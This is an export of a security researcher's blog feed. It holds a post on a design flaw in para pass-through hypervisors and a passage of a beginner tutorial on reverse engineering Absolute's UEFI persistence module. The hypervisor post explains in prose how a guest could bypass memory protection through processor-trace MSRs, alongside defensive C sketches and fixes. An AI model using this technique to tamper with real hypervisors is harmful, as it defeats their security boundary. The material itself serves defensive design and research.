tag:blogger.com,1999:blog-29378607230341113472024-03-21T12:22:37.025-07:00Satoshi's noteSatoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.comBlogger17125tag:blogger.com,1999:blog-2937860723034111347.post-10695217877974421222023-03-20T20:28:00.001-07:002023-03-20T20:34:55.512-07:00Moving to the new blog platformI am excited to announce that I moved to <a href="https://tandasat.github.io/blog/">https://tandasat.github.io/blog/</a> for new blog posts. Stay tuned for more posts there!Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com0tag:blogger.com,1999:blog-2937860723034111347.post-62677577107892973432021-12-23T17:52:00.003-08:002021-12-29T08:11:10.726-08:00Para pass-through hypervisors and their common design problem<div style="text-align: left;">Or, bypassing hypervisor memory protection with this one weird trick!</div><div style="text-align: left;"><br /></div><h2 style="text-align: left;">Takeaways </h2><p>It is substantially harder to protect a hypervisor from tampering by a guest when it allows the guest to access hardware capabilities on an opt-out basis. Some processor features may be abused to corrupt hypervisor memory regions from the guest even if they are protected through Second Level Address Translation (SLAT) and IOMMU. The Intel Processor Trace feature is one such example. </p><p>If the hypervisor needs to be protected from tampering by the guest, hardware access from the guest should be blocked by default and allowed only on an opt-in basis instead. </p><h2 style="text-align: left;">Para pass-through hypervisor design and implementation</h2><p>Hypervisors may be designed in a way that the guest remains capable of accessing most system resources. This is done when the hypervisor functions as part of the current system stack (ie, hardware, firmware, operating system, and applications) to offer additional features, instead of running multiple instances of virtualized system stacks. 
For example, <a href="https://en.wikipedia.org/wiki/Blue_Pill_%28software%29" target="_blank">Blue Pill</a> was a hypervisor adding a rootkit capability to the currently running system, and Avast, Kaspersky and other vendors developed hypervisors for <strike>the same</strike> security <a href="https://github.com/tanduRE/AvastHV" target="_blank">rather</a> <a href="https://github.com/iPower/KasperskyHook" target="_blank">entertainingly</a>. </p><p>Unlike the full-fledged hypervisors like Xen, KVM/QEMU, VMware, and Hyper-V, which can create full virtualized system stacks (eg, virtual processor, chipset, peripheral devices, and firmware), those hypervisors are add-ons to the current system, and thus, there is no need to create a new fully virtualized environment. This leads to an interesting hypervisor design sometimes referred to as a <a href="https://dl.acm.org/doi/10.1145/1508293.1508311" target="_blank">para pass-through hypervisor</a>, where a hypervisor hyper-jacks the current system and intercepts only minimal activities while passing through most of them to hardware. 
</p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnMSfJwWXJhFrmJpBBE5ttKIFdqc4cKRXW2Gu7XkXx4z728MvMaIqhN5H9QnIdHlGBRsAwYt3OADgROziplLxFRTT8wc4li0uChtlHMb2IxJ_V8IfeVdgb9O66n_f-o2nGRUneaQr1Rrk/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="427" data-original-width="1196" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnMSfJwWXJhFrmJpBBE5ttKIFdqc4cKRXW2Gu7XkXx4z728MvMaIqhN5H9QnIdHlGBRsAwYt3OADgROziplLxFRTT8wc4li0uChtlHMb2IxJ_V8IfeVdgb9O66n_f-o2nGRUneaQr1Rrk/w640-h228/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Illustration of hypervisor designs</td></tr></tbody></table><p></p><p>Implementation of such a hypervisor might look like this:</p><p>When a hypervisor can be configured not to intercept system activities that are unnecessary, it does so to reduce overhead. For example, on Intel processors, access to the Model Specific Registers (MSRs) from the guest can be configured not to cause interception (VM-exit). By doing so, the guest is free to read from and write to MSRs and use associated hardware features, which minimizes the chances of compatibility and performance issues.</p><p>In other cases where interception cannot be disabled, the hypervisor intercepts the guest activity but repeats the same operation on behalf of the guest. The CPUID instruction, for example, always causes VM-exit on Intel processors. However, the hypervisor executes the CPUID instruction with the same parameters as the guest attempted and returns the results to the guest. This effectively lets the guest execute the instruction and get the results from the processor as if there were no hypervisor. 
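</p><p>The MSR pass-through configuration described above can be sketched as follows. This is a minimal illustration, assuming the MSR bitmap layout documented in the Intel SDM (a 4-KByte page split into read and write bitmaps for low and high MSRs, where a set bit causes VM-exit). The function and macro names are hypothetical and not taken from any particular hypervisor.</p>

```c
#include <stdint.h>
#include <string.h>

/* Assumed layout of the 4-KByte VMX MSR bitmap: four 1-KByte regions.
   A set bit means "cause VM-exit"; a clear bit means "pass through". */
#define MSR_BITMAP_SIZE   4096u
#define WRITE_LOW_OFFSET  2048u  /* WRMSR, MSRs 0x00000000-0x00001FFF */
#define WRITE_HIGH_OFFSET 3072u  /* WRMSR, MSRs 0xC0000000-0xC0001FFF */

/* Pass-through default: no MSR covered by the bitmap causes VM-exit. */
void msr_bitmap_pass_through_all(uint8_t *bitmap)
{
    memset(bitmap, 0, MSR_BITMAP_SIZE);
}

/* Finds the byte and bit that control WRMSR interception for `msr`.
   Returns -1 when the MSR is outside both ranges covered by the bitmap. */
static int write_bit_position(uint32_t msr, uint32_t *byte_offset, uint8_t *mask)
{
    uint32_t base, index;

    if (msr <= 0x00001FFFu) {
        base = WRITE_LOW_OFFSET;
        index = msr;
    } else if (msr >= 0xC0000000u && msr <= 0xC0001FFFu) {
        base = WRITE_HIGH_OFFSET;
        index = msr - 0xC0000000u;
    } else {
        return -1;
    }
    *byte_offset = base + index / 8u;
    *mask = (uint8_t)(1u << (index % 8u));
    return 0;
}

/* Marks WRMSR to `msr` as intercepted. Returns 0 on success, -1 if the
   MSR is not covered by the bitmap. */
int msr_bitmap_intercept_write(uint8_t *bitmap, uint32_t msr)
{
    uint32_t byte_offset;
    uint8_t mask;

    if (write_bit_position(msr, &byte_offset, &mask) != 0) {
        return -1;
    }
    bitmap[byte_offset] |= mask;
    return 0;
}

/* Returns nonzero if WRMSR to `msr` causes VM-exit. MSRs outside the
   covered ranges always cause VM-exit when MSR bitmaps are in use. */
int msr_bitmap_is_write_intercepted(const uint8_t *bitmap, uint32_t msr)
{
    uint32_t byte_offset;
    uint8_t mask;

    if (write_bit_position(msr, &byte_offset, &mask) != 0) {
        return 1;
    }
    return (bitmap[byte_offset] & mask) != 0;
}
```

<p>Clearing the whole bitmap gives the pass-through behavior; a hypervisor following this design then sets bits only for the few MSRs it wants to see.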
</p><p>This is a fairly common design and implementation for research hypervisors, as it reduces a significant amount of code that needs to be written while avoiding compatibility issues. The hypervisor cares only about what it cares about. It is all fun and games. </p><p>Until one hopes to protect the hypervisor from tampering by the guest. </p><h2 style="text-align: left;">Hypervisor protection from the guest </h2><p>It is natural to think of protecting the hypervisor from the guest given that the virtualization technology allows a piece of software (ie, the hypervisor) to run at a higher privilege level than the traditional kernel mode. A developer of para pass-through hypervisor-based security software will not want malicious kernel-mode code to be able to disable, bypass, or modify the hypervisor.</p><p>Such protection is implemented by leveraging SLAT and IOMMU, such as Extended Page Tables (EPT) and DMA remapping on Intel processors. For example, DMA attempting to access physical memory that the hypervisor resides in or uses may be blocked by removing access permission in the IOMMU translation tables. The same goes for standard memory access by processors using SLAT. </p><h2 style="text-align: left;">SLAT and IOMMU bypass with a processor feature</h2><p>Interestingly, however, multiple processor features completely bypass translations by SLAT and IOMMU. If those features are exposed to the guest, the guest would be able to corrupt contents of the physical memory regions that were supposed to be inaccessible. </p><p>Intel Processor Trace is such an example. Intel Processor Trace is a feature to trace code execution by the processor itself and let software analyze trace logs later. The logs are written to the physical address specified by the IA32_RTIT_OUTPUT_BASE MSR, and tracing is started by setting bit 0 of the IA32_RTIT_CTL MSR. 
Thus, if the guest were able to write to those two MSRs, it would be possible to corrupt hypervisor memory by setting such a physical address to the IA32_RTIT_OUTPUT_BASE MSR and starting tracing.</p><p>One might think the simplest fix would be opting out of this feature by intercepting writes to the MSRs and injecting #GP(0). That is not enough, as those two MSRs are part of an XSAVE-managed state component, which may be set with the XRSTORS instruction as well. This must be taken care of too. </p><p>Alternatively, one can set the "Intel PT uses guest physical addresses" VM-execution control to have the processor treat the address specified via the MSR as a guest physical address and go through translation with the EPT.</p><p>This is what I found in some research hypervisors like <a href="https://github.com/matsu/bitvisor" target="_blank">BitVisor</a>.</p><h2 style="text-align: left;">The design problem </h2><p>Given the previously discussed fix, now, the hypervisor is protected from tampering again. What about the hardware feedback interface that is newly added to the 12th gen Intel processors? This is a feature to let the processor give "feedback" to software by writing performance information onto the physical memory address specified by the IA32_HW_FEEDBACK_PTR MSR. Again, if the guest were able to write to the MSR, it would be possible to corrupt hypervisor memory by writing a hypervisor address to the MSR. A fix would simply be opting out of the feature by intercepting writes to the MSR and injecting #GP(0). </p><p>Though at this point, one can expect that the same issue may resurface in the future as the processor features expand. Additionally, how can we be sure that there are no other hardware features that allow similar corruption? The chipset, for example, has hundreds (if not thousands) of registers that offer little-known capabilities and evolve every generation. 
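</p><p>To make the difference between blocking known-dangerous MSRs (opt-out) and allowing only known-safe MSRs (opt-in) concrete, here is a small sketch. The MSR numbers are the architectural ones for the registers named above; the contents of both lists and the function names are hypothetical and chosen only for illustration, not a vetted policy.</p>

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define IA32_RTIT_OUTPUT_BASE 0x560u
#define IA32_RTIT_CTL         0x570u
#define IA32_HW_FEEDBACK_PTR  0x17D0u      /* added in later processors */
#define IA32_FS_BASE          0xC0000100u
#define IA32_GS_BASE          0xC0000101u

/* Opt-out: only the MSRs known to be dangerous when the list was written. */
static const uint32_t deny_list[] = { IA32_RTIT_OUTPUT_BASE, IA32_RTIT_CTL };

/* Opt-in: hypothetical examples of MSRs reviewed and judged safe to expose. */
static const uint32_t allow_list[] = { IA32_FS_BASE, IA32_GS_BASE };

static bool list_contains(const uint32_t *list, size_t count, uint32_t msr)
{
    for (size_t i = 0; i < count; i++) {
        if (list[i] == msr) {
            return true;
        }
    }
    return false;
}

/* Opt-out policy: a write is blocked only if the MSR is on the deny list. */
bool opt_out_blocks_write(uint32_t msr)
{
    return list_contains(deny_list, sizeof(deny_list) / sizeof(deny_list[0]), msr);
}

/* Opt-in policy: a write is blocked unless the MSR is on the allow list. */
bool opt_in_blocks_write(uint32_t msr)
{
    return !list_contains(allow_list, sizeof(allow_list) / sizeof(allow_list[0]), msr);
}
```

<p>With the opt-out policy, IA32_HW_FEEDBACK_PTR stays writable until someone learns about it and updates the list; with the opt-in policy, it is blocked without any code change.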
</p><p></p>It is very challenging to keep the hypervisor protected from the guest when the hypervisor limits the hardware access from the guest only on the opt-out basis. Instead, all major hypervisors expose hardware features on the opt-in basis and emulate the rest. For example, all MSR accesses are intercepted except those that are deemed to be safe. <p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhmAMaVpWdidVJ84-fKoIi3L9GsIFt6NqAIAyWjuerTUFSNshm9CA9lBiyltZkMDb4RCqRPT-W3Rjt4Nxx17WV46OGj4ppiWK2_YnwtsCRITINpl5RC5nab27mq7XEZxP5560iKwbuGRSbWFF-4tRs1jwOx11hBKW_kVqCBsdKghr5dUBo1kiEr9gec=s2016" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1512" data-original-width="2016" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEhmAMaVpWdidVJ84-fKoIi3L9GsIFt6NqAIAyWjuerTUFSNshm9CA9lBiyltZkMDb4RCqRPT-W3Rjt4Nxx17WV46OGj4ppiWK2_YnwtsCRITINpl5RC5nab27mq7XEZxP5560iKwbuGRSbWFF-4tRs1jwOx11hBKW_kVqCBsdKghr5dUBo1kiEr9gec=s320" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Holiday happy cat</td></tr></tbody></table>For most para pass-through hypervisor developers, this is not going to be a pragmatic solution though, as assessing what to expose to the guest and emulating missing pieces would dramatically increase the size of the effort. 
<a href="https://theinvisiblethings.blogspot.com/2012/01/thoughts-on-deepsafe.html">As already pointed out 10 years ago</a>, if a hypervisor is an expansion of Blue Pill, it would be better off admitting it and not trying to pretend to be a new security boundary.<p></p><br /><p><br /></p><br />Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com0tag:blogger.com,1999:blog-2937860723034111347.post-65886532982311923322021-04-12T06:52:00.000-07:002021-04-12T06:52:28.619-07:00Reverse engineering (Absolute) UEFI modules for beginners <p>This post introduces how one can start reverse engineering
UEFI-based BIOS modules. Taking Absolute as an example, this post serves as a tutorial of BIOS module reverse engineering with free tools and approachable steps for beginners.</p><p class="MsoNormal"><o:p></o:p></p>
<p class="MsoNormal">This post does not explain how to disable Absolute or discover issues in it.</p><p class="MsoNormal">In this post, the terms "BIOS", "UEFI" and "firmware" all refer to UEFI-based host firmware and are interchangeable. </p><p></p><h2>Background Story<o:p></o:p></h2><div><p class="MsoNormal">You can skip this section. <o:p></o:p></p>
<p class="MsoNormal">Last week, I got a Dell laptop with Absolute activated.</p><p class="MsoNormal"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiteF2e9UwYchmZDCovx23WJawqMeUIZLIEHa8QNqMVZia__PW-Q9Z-duN4D-iqDe1kTyXMtyaXtRncsvYc87ah_pskj7rI5OmfC7SZNVzUF1XCH9IWPzhV5xm71-miPBP2zjgJBM4RTsM/" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img alt="" data-original-height="1500" data-original-width="1500" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiteF2e9UwYchmZDCovx23WJawqMeUIZLIEHa8QNqMVZia__PW-Q9Z-duN4D-iqDe1kTyXMtyaXtRncsvYc87ah_pskj7rI5OmfC7SZNVzUF1XCH9IWPzhV5xm71-miPBP2zjgJBM4RTsM/w98-h98/image.png" width="98" /></a></p>Absolute, formerly known as Computrace, is a popular piece of data and device security
software with an interesting persistence technology, as explained on <a href="https://en.wikipedia.org/wiki/Absolute_Software_Corporation">Wikipedia</a>.</div><div><p></p></div><p class="MsoNormal"></p><blockquote><p class="MsoNormal"><i>Absolute's flagship product is the Absolute Platform,
formerly known as Data and Device Security (DDS). Absolute relies on patented
Persistence technology, which is embedded into the firmware of most computers,
tablets, and smartphones at the factory.[25]<o:p></o:p></i></p><p class="MsoNormal">
</p><p class="MsoNormal"><i>The Persistence module is activated once the Absolute agent
is installed. If the software client is removed from a device through flashing
the firmware, replacing the hard drive, reimaging the device, or resetting the
device back to factory settings, Persistence technology will trigger an
automatic reinstallation of the software client.[25] Persistence technology is
embedded in more than half a billion devices worldwide.</i></p></blockquote><p class="MsoNormal"><o:p></o:p></p><p class="MsoNormal">I read multiple articles about its internals in the past
but did not know much about the modules embedded in the firmware. Out of curiosity, I started to reverse engineer it, then decided to write up the steps I took because I believed this area needed more engineers' scrutiny and tutorials for it.</p><h2>Getting a BIOS image<o:p></o:p></h2><p class="MsoNormal">There are two easy ways to get a BIOS image to analyze:
extracting from an update package or using CHIPSEC.<o:p></o:p></p><p class="MsoNormal">
</p><p class="MsoNormal">BIOS images may be extracted from BIOS update packages OEMs
publish. For example, recent Dell BIOS images can be extracted with a script found in <a href="https://twitter.com/platomaniac">@platomaniac</a>'s <o:p></o:p><a href="https://github.com/platomav/BIOSUtilities">BIOSUtilities </a>repo.</p><p class="MsoNormal">As a handy sample, here is <a href="https://www.dell.com/support/home/en-ca/drivers/driversdetails?driverid=d0fh4&oscode=wt64a&productcode=xps-15-7590-laptop">the Dell BIOS image</a> we will analyze in this
post.</p><p class="MsoNormal"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0UAioYhd1BoKONIq5HGHf-eHr1GbJi9bfYqIFW030JQrtpW1Ddo7989tV15Za0DCvm6bLFZKAkZInXvG44t6BW4oRQDnM4GX_hkJ85K3L4t7ukbcdA-9_n6_an73pPKh-SKcYNXyNQoQ/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="269" data-original-width="1074" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0UAioYhd1BoKONIq5HGHf-eHr1GbJi9bfYqIFW030JQrtpW1Ddo7989tV15Za0DCvm6bLFZKAkZInXvG44t6BW4oRQDnM4GX_hkJ85K3L4t7ukbcdA-9_n6_an73pPKh-SKcYNXyNQoQ/w640-h160/image.png" width="640" /></a></div><p class="MsoNormal">Alternatively, with <a href="https://github.com/chipsec/chipsec">CHIPSEC</a>, one can dump the BIOS image of the current system with
this command after installation if the system is supported.</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><p class="MsoNormal" style="text-align: left;">$ python chipsec_util.py spi dump rom.bin</p></blockquote><h2>Identifying Absolute's module<o:p></o:p></h2><p>UEFI modules are normally OS-agnostic. This is, however, not
the case for modules that need to interact with the OS environment, for example, to establish
OS-level persistence. We can find such peculiar modules by
searching for OS-specific strings such as "System32" and
"NtOpen." Let us do this.</p><p class="MsoNormal"><o:p></o:p></p>
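<p class="MsoNormal">The same kind of search can also be done outside a GUI tool. The sketch below assumes that a string may be stored either as ASCII or as UTF-16LE (which Windows-related paths commonly are) and scans a buffer for both encodings. The function names are hypothetical, and the searched text is assumed to consist of plain ASCII characters.</p>

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Returns the offset of the first occurrence of `needle` in `data`,
   or -1 if it does not occur. */
long find_bytes(const uint8_t *data, size_t data_len,
                const uint8_t *needle, size_t needle_len)
{
    if (needle_len == 0 || needle_len > data_len) {
        return -1;
    }
    for (size_t i = 0; i + needle_len <= data_len; i++) {
        if (memcmp(data + i, needle, needle_len) == 0) {
            return (long)i;
        }
    }
    return -1;
}

/* Searches for `text` stored as single-byte ASCII characters. */
long find_ascii(const uint8_t *data, size_t data_len, const char *text)
{
    return find_bytes(data, data_len, (const uint8_t *)text, strlen(text));
}

/* Searches for `text` stored as UTF-16LE: each ASCII character is
   followed by a zero byte. Handles text of up to 128 characters. */
long find_utf16le(const uint8_t *data, size_t data_len, const char *text)
{
    uint8_t wide[256];
    size_t text_len = strlen(text);

    if (text_len * 2 > sizeof(wide)) {
        return -1;
    }
    for (size_t i = 0; i < text_len; i++) {
        wide[2 * i] = (uint8_t)text[i];
        wide[2 * i + 1] = 0;
    }
    return find_bytes(data, data_len, wide, text_len * 2);
}
```

<p class="MsoNormal">Running both searches over each extracted module body and flagging the modules where either one hits gives a short list of candidates to inspect by hand.</p>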
<p class="MsoNormal">Open the extracted image with <a href="https://github.com/LongSoft/UEFITool">UEFITool</a> and search for
"System32". This will list 821ACA26-29EA-4993-839F-597FC021708D. </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhII2l8zfAP6NOj7wvCuNJjMb3unevPuhbz9JwcX4fZNptaclCn0maigXJjR7plrOsbnQpX8ueH4jS1Ff_6pp15zsOEfLrfxajunvP3GYVwhChDvqBdFHexqF2MxfSrLBEVYwlxPYLmL5g/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="186" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhII2l8zfAP6NOj7wvCuNJjMb3unevPuhbz9JwcX4fZNptaclCn0maigXJjR7plrOsbnQpX8ueH4jS1Ff_6pp15zsOEfLrfxajunvP3GYVwhChDvqBdFHexqF2MxfSrLBEVYwlxPYLmL5g/s16000/image.png" /></a></div><o:p></o:p><p></p><p class="MsoNormal">Note that UEFI modules are identified by GUIDs and not
human-friendly names. Names may be specified but are optional and unused by the
platform software. Take 821ACA26-29EA-4993-839F-597FC021708D as an example: it
is unnamed in our image, but in other images, it is named
"efiinstnats". The internet also suggests it may be named
"AbsoluteAbtInstaller". <o:p></o:p></p><h2>Reverse Engineering a UEFI module<o:p></o:p></h2><div><p class="MsoNormal">As UEFITool shows, UEFI modules are mostly in the PE
format and can be analyzed with existing tools. </p><p class="MsoNormal">To reverse engineer 821ACA26-29EA-4993-839F-597FC021708D, in UEFITool, right-click the
file and extract its body. Then, install <a href="https://ghidra-sre.org/">Ghidra</a> and the <a href="https://github.com/DSecurity/efiSeek">efiSeek</a> plugin as a free option. The other popular option is IDA and <a href="https://github.com/binarly-io/efiXplorer">efiXplorer</a>, though the
free version of IDA is not usable for our scenario. </p></div><p class="MsoNormal"><o:p></o:p></p><p class="MsoNormal">Open the extracted file
(821ACA26-29EA-4993-839F-597FC021708D) with Ghidra and make sure efiSeek is
checked for auto analysis. Ignore a warning about PDB if it appears.<o:p></o:p></p><p class="MsoNormal"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixeXLBd5LuFVtYmZvM4Rdv7p2nzYzFgTKlfIdu8zW9jRKhkONxEkYmXc4tR2z1L1KI2rSCwJELlZ4FGRuCodsovJ4_fB9JQd3HfmsmbMMycxuvlYRTMHnnTBO9sDiKF1i7dlinswvcfeA/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="333" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixeXLBd5LuFVtYmZvM4Rdv7p2nzYzFgTKlfIdu8zW9jRKhkONxEkYmXc4tR2z1L1KI2rSCwJELlZ4FGRuCodsovJ4_fB9JQd3HfmsmbMMycxuvlYRTMHnnTBO9sDiKF1i7dlinswvcfeA/s16000/image.png" /></a></div><br />The strings contained in the module are VERY interesting.<br /><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyRWZ-c0LHNU5CoqeZoEOoMHocCLqlhgsTpGDPvpv-7RoLyY6mV6fer4nDeNSI6PuhbLaOmcwtLNcM7fJcTXFqewqDZCkadEaHRga_Ezz4W3ikcUNbx6fOr3y6JHc3pKVaq7S_gqGMLXA/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="346" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyRWZ-c0LHNU5CoqeZoEOoMHocCLqlhgsTpGDPvpv-7RoLyY6mV6fer4nDeNSI6PuhbLaOmcwtLNcM7fJcTXFqewqDZCkadEaHRga_Ezz4W3ikcUNbx6fOr3y6JHc3pKVaq7S_gqGMLXA/s16000/image.png" /></a></div><p></p><p class="MsoNormal">What on earth does a UEFI module have to do with SystemRoot? Either
way, the string “Computrace” indicates this is Absolute’s component.</p><p class="MsoNormal">By peeking at functions called from the entry point, we can
find an interesting function calling <a href="https://github.com/tianocore/edk2/blob/0ecdcb6142037dd1cdd08660a2349960bcf0270a/MdePkg/Include/Protocol/AcpiTable.h#L73">InstallAcpiTable()</a>. </p><p class="MsoNormal"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIU6WWXuiAg5nSnV1m6IFqMOTxA53nShoKBnh4eVf22DRm_t_gajYCR6LvCZ_wf00PqyIdW68hpScgXCyReTBrN6uBPxW7MqX1HASDaSYB8iCgMXgnSHSHjYIabAUUtgbI2rRg6-MNQbU/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="453" data-original-width="611" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIU6WWXuiAg5nSnV1m6IFqMOTxA53nShoKBnh4eVf22DRm_t_gajYCR6LvCZ_wf00PqyIdW68hpScgXCyReTBrN6uBPxW7MqX1HASDaSYB8iCgMXgnSHSHjYIabAUUtgbI2rRg6-MNQbU/s16000/image.png" /></a></div>As we can read from
the API name, it installs… an ACPI table, but what is it? With a little bit of cleanup,
we can see that some values that look like string literals are assigned to the table
variable, in particular, WPBT at the offset 0 looks interesting. <div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI2og1oPu0JQiZMLdnItelIOWgYAfwoxw9j-PIKlYwbskP8OEZnJg5n_kAberaapqY-KK4gYMKY3dxnJvDwuw9Oz8UczRnxUIuzeEQxuQWbO8jvGJUx52SRpTn4qpRURvxSi4M1idNXGQ/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="219" data-original-width="349" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI2og1oPu0JQiZMLdnItelIOWgYAfwoxw9j-PIKlYwbskP8OEZnJg5n_kAberaapqY-KK4gYMKY3dxnJvDwuw9Oz8UczRnxUIuzeEQxuQWbO8jvGJUx52SRpTn4qpRURvxSi4M1idNXGQ/s16000/image.png" /></a></div><p class="MsoNormal">With some google, we can find the Microsoft’s document
explaining the table: <a href="https://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx">Windows Platform Binary Table (WPBT)</a> (DOCX)</p><p class="MsoTitle"><o:p></o:p></p><p class="MsoNormal">In short, this type of ACPI table lets a UEFI module instruct
Windows’ Session Manager to launch a specified executable on startup. We
can see the use of the table in the code.</p><p class="MsoNormal"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTKW_48Pq_1rUReTsFPWVvqt0N-4rvUiKHCGuuzf5MBSklabRd6FGnNisVsjyFeDA5vakWNA89ehNN59fUcOHA60Xto4_VIvzVBIPQSwkSVwWKNyPBttmTVLRACoon-Cq73912YgKb9ac/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="79" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTKW_48Pq_1rUReTsFPWVvqt0N-4rvUiKHCGuuzf5MBSklabRd6FGnNisVsjyFeDA5vakWNA89ehNN59fUcOHA60Xto4_VIvzVBIPQSwkSVwWKNyPBttmTVLRACoon-Cq73912YgKb9ac/s16000/image.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIRebgJvUpI-fkWK_yz1kFylkoaCDiibiWjVs_Xnexf7r-QVSW1C3gGuLQQiTLCJARUgxImQrBMS-C0MW5E1G2ZvdUbbIhb8hwxZdDfu8TrItrID0290dCCESY6lmdl-bpvldpGDKIEhU/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="400" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIRebgJvUpI-fkWK_yz1kFylkoaCDiibiWjVs_Xnexf7r-QVSW1C3gGuLQQiTLCJARUgxImQrBMS-C0MW5E1G2ZvdUbbIhb8hwxZdDfu8TrItrID0290dCCESY6lmdl-bpvldpGDKIEhU/s16000/image.png" /></a></div><p class="MsoNormal">Let us just verify what is being registered. The handoff
memory appears to be initialized with the data at 0x80013178, which are coming from 0x80001138 containing the MZ header.</p><p class="MsoNormal"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhHCEYbLfyEL4ZClFprgI7DpgHUIFYw9UVrHJ5Nf1IkTcyEzX-scd4ypZ9G8Dq_AD4Pu8OJhLJRR398Ppq9o-fLWC7vbBxnTeKWR1qNTDKIpcNpKinvqD8nIsiPp_ak9uD5lV7DJ9b-Rs/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="94" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhHCEYbLfyEL4ZClFprgI7DpgHUIFYw9UVrHJ5Nf1IkTcyEzX-scd4ypZ9G8Dq_AD4Pu8OJhLJRR398Ppq9o-fLWC7vbBxnTeKWR1qNTDKIpcNpKinvqD8nIsiPp_ak9uD5lV7DJ9b-Rs/s16000/image.png" /></a></div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO-tNhvRAZyLxIuZ9RVL8iIXKWoiEQdRmMHcP2prnSwPR56TjNKiNZEsac0j2ZJitNUew2NdC1JYZypC2kajUUgiZwcnW-eonZfhAScLAHWvEv-r_1fSBWi3eJRRZmUK_eh9zCL3IA-Q8/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="52" data-original-width="350" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO-tNhvRAZyLxIuZ9RVL8iIXKWoiEQdRmMHcP2prnSwPR56TjNKiNZEsac0j2ZJitNUew2NdC1JYZypC2kajUUgiZwcnW-eonZfhAScLAHWvEv-r_1fSBWi3eJRRZmUK_eh9zCL3IA-Q8/s16000/image.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYI0byMkkmNCrY7upsByJeloaZYOdSeDnJyCa9TjHXKYlnzaUtCXy1bbEFhkLbC1BE3lbXjt_Emy62Hk0ScHBMlC8ZMBWp6XW9Iq7oSYRhE5Y53v6gHiJj2RG3XxqVbapP7cxAd832IPs/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="151" data-original-width="328" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYI0byMkkmNCrY7upsByJeloaZYOdSeDnJyCa9TjHXKYlnzaUtCXy1bbEFhkLbC1BE3lbXjt_Emy62Hk0ScHBMlC8ZMBWp6XW9Iq7oSYRhE5Y53v6gHiJj2RG3XxqVbapP7cxAd832IPs/s16000/image.png" /></a></div><p></p><p class="MsoNormal">From here, you could investigate smss.exe to see how the program
is executed and wpbbin.exe to see the contents of the program. In this post, however, we are going to look
